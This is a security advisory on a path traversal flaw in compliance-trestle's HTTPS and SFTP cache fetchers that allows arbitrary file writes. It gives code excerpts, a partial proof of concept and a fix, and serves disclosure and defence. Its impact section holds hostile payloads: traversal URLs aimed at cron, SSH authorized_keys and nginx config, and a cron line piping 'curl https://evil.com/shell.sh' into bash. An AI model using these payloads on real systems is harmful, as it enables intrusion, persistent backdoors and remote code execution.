Lack of data validation - Path Traversal In compliance-trestle

Description

compliance-trestle Remote Fetching Mechanism has an Arbitrary File Write via Cache Path Traversal

Summary

The compliance-trestle library's remote fetching cache mechanism (HTTPSFetcher and SFTPFetcher) constructs the local cache file path from the URL path component without sanitizing path traversal sequences (../). When a remote OSCAL profile references a URL with traversal in its path, the HTTP response body is written to a location outside the intended cache directory, enabling arbitrary file write with attacker-controlled content to the filesystem.

Attack chain: Malicious OSCAL profile → HTTPS fetch → cache path traversal → arbitrary file write → RCE (via cron, SSH keys, etc.)

Affected Component

Repository: https://github.com/IBM/compliance-trestle File: trestle/core/remote/cache.py (lines 259-266 for HTTPSFetcher, lines 328-333 for SFTPFetcher) Version: v4.0.2 (latest as of 2026-04-30)

Vulnerable Code

cache.py:259-266 — HTTPSFetcher cache path construction

class HTTPSFetcher(FetcherBase):
    def __init__(self, trestle_root: pathlib.Path, uri: str) -> None:
        # ...
        u = parse.urlparse(self._uri)
        # ...
        if u.hostname is None:
            raise TrestleError(f'Cache request for {self._uri} requires hostname')
        https_cached_dir = self._trestle_cache_path / u.hostname...

cache.py:285-295 — Content written to traversed path

    def _do_fetch(self) -> None:
        # ...
        response = requests.get(self._url, auth=auth, verify=verify, timeout=30)
        if response.status_code == 200:
            result = response.text  # ❌ Attacker-controlled content
            self._cached_object_path.write_text(result)  # ❌ Written to arbitrary path

cache.py:328-333 — SFTPFetcher (identical pattern)

class SFTPFetcher(FetcherBase):
    def __init__(self, ...):
        # Identical path construction — same vulnerability
        sftp_cached_dir = self._trestle_cache_path / u.hostname
        path_parent = pathlib.Path(u.path[re.search('[^/\\\\]', u.path).span()[0] :]).parent
        sftp_cached_dir = sftp_cached_dir / path_parent
        sftp_cached_dir.mkdir(parents=True, exist_ok=True)
        self._cached_object_path = sftp_cached_dir / pathlib.Path(pathlib.Path(u.path).name)...

Root Cause:

    urlparse("https://evil.com/../../../tmp/pwned.json").path = /../../../tmp/pwned.json — preserves ../

    pathlib.Path(u.path).parent preserves traversal sequences

    cache_dir / hostname / "../../../../../../tmp" resolves outside cache

    mkdir(parents=True, exist_ok=True) creates intermediate directories

    write_text(response.text) writes attacker-controlled content to traversed path

    No is_relative_to() boundary check on the resolved path

Steps to Reproduce

Prerequisites

pip install compliance-trestle==4.0.2

PoC: Malicious OSCAL Profile

# malicious_profile.yaml — arbitrary file write via cache traversal
profile:
  uuid: "550e8400-e29b-41d4-a716-446655440000"
  metadata:
    title: "Malicious Profile"
    version: "1.0"
    last-modified: "2024-01-01T00:00:00+00:00"
    oscal-version: "1.0.4"...

PoC: Cache Path Traversal Simulation

#!/usr/bin/env python3
"""PoC: Cache path traversal → arbitrary file write"""
import os, re, tempfile, shutil
from pathlib import Path
from urllib.parse import urlparse

# Simulate trestle cache behavior (cache.py:259-266)
trestle_root = Path(tempfile.mkdtemp(prefix="trestle_poc_"))...

Expected: Write confined to .trestle/.cache/ directory Actual: File written to /tmp/trestle_pwned.json (arbitrary filesystem location)

Remediation

Fix for HTTPSFetcher (cache.py:259-266):

class HTTPSFetcher(FetcherBase):
    def __init__(self, trestle_root: pathlib.Path, uri: str) -> None:
        # ...
        u = parse.urlparse(self._uri)
        https_cached_dir = self._trestle_cache_path / u.hostname

        # ✅ Sanitize path: remove traversal sequences
        safe_path = pathlib.PurePosixPath(u.path).parts...

Same fix required for SFTPFetcher at lines 328-333.

References

Impact

1. Cron Job Injection → Remote Code Execution

# Profile that writes a cron job
imports:
  - href: "https://evil.com/../../../../../../../etc/cron.d/backdoor"

Attacker's server responds with:

* * * * * root /bin/bash -c 'curl https://evil.com/shell.sh | bash'

2. SSH Authorized Keys Injection

imports:
  - href: "https://evil.com/../../../../../../../root/.ssh/authorized_keys"

Attacker's server responds with their SSH public key.

3. Config File Overwrite

imports:
  - href: "https://evil.com/../../../../../../../etc/nginx/conf.d/evil.conf"

4. Python Path Hijacking

Write malicious .py file to a location on sys.path for code execution on next import.

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem
Package
Affected version
Patched versions